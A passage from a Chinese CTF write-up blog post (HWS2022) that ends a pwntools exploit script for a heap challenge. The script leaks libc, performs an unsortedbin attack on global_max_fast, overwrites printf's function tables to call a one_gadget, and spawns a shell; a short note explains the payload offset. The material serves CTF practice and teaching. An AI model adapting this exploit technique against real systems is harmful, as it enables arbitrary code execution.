<span class="number">0x10a41c</span></span><br><span class="line"></span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : p.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : p.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : p.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : p.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : p.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : p.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : p.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+hex(addr))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">offset2size</span><span class="params">(offset)</span>:</span></span><br><span class="line">    <span class="keyword">return</span> str((offset) * <span class="number">2</span> - <span class="number">0x10</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#0x4f3d5 execve("/bin/sh", rsp+0x40, environ)</span></span><br><span class="line"><span class="comment">#0x4f432 execve("/bin/sh", rsp+0x40, environ)</span></span><br><span class="line"><span class="comment">#0x10a41c execve("/bin/sh", rsp+0x70, environ)</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"><span class="comment">#p.interactive()</span></span><br><span class="line">p.recvuntil(<span class="string">"what size?\n"</span>)</span><br><span class="line">p.sendline(offset2size(PRINTF_ARGINFO - MAIN_ARENA))</span><br><span class="line">p.recvuntil(<span class="string">"what size?\n"</span>)</span><br><span class="line">p.sendline(offset2size(PRINTF_FUNCTABLE - MAIN_ARENA))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">"rename?(y/n)\n"</span>)</span><br><span class="line">p.sendline(<span class="string">"y"</span>)</span><br><span class="line">p.recvuntil(<span class="string">"Now your name is:"</span>)</span><br><span class="line"></span><br><span class="line">libc_offset = u64(p.recvuntil(<span class="string">'\x7f'</span>.encode()).ljust(<span class="number">8</span>,<span class="string">"\x00"</span>.encode()))</span><br><span class="line">libc_base = libc_offset - MAIN_ARENA_DELTA - MAIN_ARENA</span><br><span class="line">leak(<span class="string">"libc_base"</span>,libc_base)</span><br><span class="line"><span class="comment">#unsortedbin attack</span></span><br><span class="line">p.sendline(p64(libc_offset) + p64(libc_base + GLOBAL_MAX_FAST - <span class="number">0x10</span>))</span><br><span class="line"></span><br><span class="line">ru(<span class="string">"box?(1:big/2:bigger)\n"</span>)</span><br><span class="line">sl(<span class="string">"1"</span>)</span><br><span class="line"></span><br><span class="line">one_gadget = libc_base + ONE_GADGET</span><br><span class="line"></span><br><span class="line">payload = (<span class="string">"a"</span>.encode())*<span class="number">8</span>*(ord(<span class="string">'s'</span>)<span class="number">-2</span>) + p64(one_gadget)*<span class="number">2</span></span><br><span class="line">sla(<span class="string">"\n"</span>,payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p>这里有个小细节，就是为什么我们要伪造的%s的函数，缺写的是ord(‘s’)-2</p>
<p>因为我们给printf函数表赋值的是chunk的头地址 而不是chunk data的地址，chunk的header就占了0x16也就是两个下标的大小</p>

      
    </div>

    

    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2022/02/13/ThreadSwitch/" rel="next" title="线程切换小结">
                <i class="fa fa-chevron-left"></i> 线程切换小结
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2022/03/02/2022TQLCTFWP/" rel="prev" title="2022TQLCTF WP">
                2022TQLCTF WP <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  
    <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/head.jpg" alt="zzrR0">
            
              <p class="site-author-name" itemprop="name">zzrR0</p>
              <p class="site-description motion-element" itemprop="description">Why am i so cai.</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">9</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">3</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
            </nav>
          

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://xmzyshypnc.github.io/" title="xmzyshypnc" target="_blank">xmzyshypnc</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://wood1314.github.io/" title="Wood" target="_blank">Wood</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.zeddyu.info/" title="Zedd" target="_blank">Zedd</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://kestudy.top/" title="Ke" target="_blank">Ke</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Grape"><span class="nav-number">1.</span> <span class="nav-text">Grape</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#程序分析"><span class="nav-number">1.1.</span> <span class="nav-text">程序分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#环境搭建"><span class="nav-number">1.2.</span> <span class="nav-text">环境搭建</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞利用"><span class="nav-number">1.3.</span> <span class="nav-text">漏洞利用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Refs"><span class="nav-number">1.4.</span> <span class="nav-text">Refs</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Peach"><span class="nav-number">2.</span> <span class="nav-text">Peach</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#送分题"><span class="nav-number">3.</span> <span class="nav-text">送分题</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2022</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zzrR0</span>

  

  
</div>




  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动 v3.9.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a class="theme-link" target="_blank" href="https://theme-next.org">NexT.Pisces</a> v6.3.0</div>






        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv" title="总访客量">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="site-pv" title="总访问量">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    
	
    

    
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>














  













  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.3.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.3.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.3.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.3.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.3.0"></script>



  

  
    <script id="dsq-count-scr" src="https://xmzyshypnc.disqus.com/count.js" async></script>
  

  
    <script type="text/javascript">
      var disqus_config = function () {
        this.page.url = 'http://yoursite.com/2022/02/13/HWS2022/';
        this.page.identifier = '2022/02/13/HWS2022/';
        this.page.title = 'HWS2022 复现WP';
        };
      function loadComments () {
        var d = document, s = d.createElement('script');
        s.src = 'https://xmzyshypnc.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
      }
      
        loadComments();
      
    </script>
  










  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  
  
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(function (item) {
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: true,
        notify: true,
        appId: 'YbpHIa6XHNsKv4wX2wGjnrK7-gzGzoHsz',
        appKey: '1fjf9mQl90nKdRPfq1zhDyIE',
        placeholder: '',
        avatar:'mm',
        meta:guest,
        pageSize:'10' || 10,
        visitor: true
    });
  </script>



  





  

  

  

  

  
  

  

  

  

  

  

  
<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","model":{"scale":1,"hHeadPos":0.5,"vHeadPos":0.618,"jsonPath":"live2d-widget-model-hijiki"},"display":{"superSample":2,"width":150,"height":300,"position":"right","hOffset":0,"vOffset":-50},"mobile":{"show":true,"scale":0.5},"react":{"opacityDefault":0.7,"opacityOnHover":0.2},"log":false,"tagMode":false});</script></body>
</html>
